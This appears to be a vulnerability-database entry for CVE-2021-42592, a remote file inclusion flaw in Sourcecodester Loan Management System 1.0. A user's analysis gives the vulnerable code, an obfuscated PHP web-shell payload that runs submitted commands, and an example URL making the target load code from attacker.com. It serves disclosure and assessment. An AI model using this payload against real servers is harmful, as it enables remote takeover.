Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
1

CVE-2021-42592

Last updated October 18, 2021
CVE-2021-42592
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Validated
Validated
Validated
Initial Access
Techniques
Validation
Validated

Description

** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

Add Assessment

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Easy to weaponizeGives privileged accessAuthenticated
Technical Analysis

  • A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Loan Management System 1.0 via the page parameter to index.php
    The bug is affecting the [index.php] file through [page] parameter due to unsafe usage of remotely [include] function;

  • if we tak a look at the index.php file we can see the following code:

<?php $page = isset($_GET['page']) ? $_GET['page'] :'home'; ?> <?php include $page.'.php' ?>

The index file have a parameter page and by default the value is home. Then its including the home page add .php to it.

Attacker login to the panel then create a PHP file that contains malicious PHP code on a remote server then pass the malicious file URL to the target through the [page] parameter and the target execute the code which gives permissions to the attacker to do malicious activities such as ( Delete, create, modify &, etc..) on the target server and the attacker will be able to achieve RCE ( remote code execution ).

Note: To make the server execute your malicious code your code must be like that:

 <?php
 echo base64_decode("PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+CgpDTUQgPGlucHV0IG5hbWU9ImNtZCIgdHlwZT0idGV4dCI+Cgo8YnI+CjxpbnB1dCBuYW1lPSJzdWIiIHR5cGU9InN1Ym1pdCI+CjwvZm9ybT4KPD9waHAKZWNobyAiPHByZT4iOwpzeXN0ZW0oQCRfUE9TVFsiY21kIl0pOwplY2hvICI8L3ByZT4iOwo/Pg==");
 ?>

E.x: http://target.com/index.php?page=http://attacker.com/exploit
Note: Don’t add [.php] to your attacker URL because the script will add .php at the end of the [page] parameter value automatically.

Log in to Add Reply

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
Unknown
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis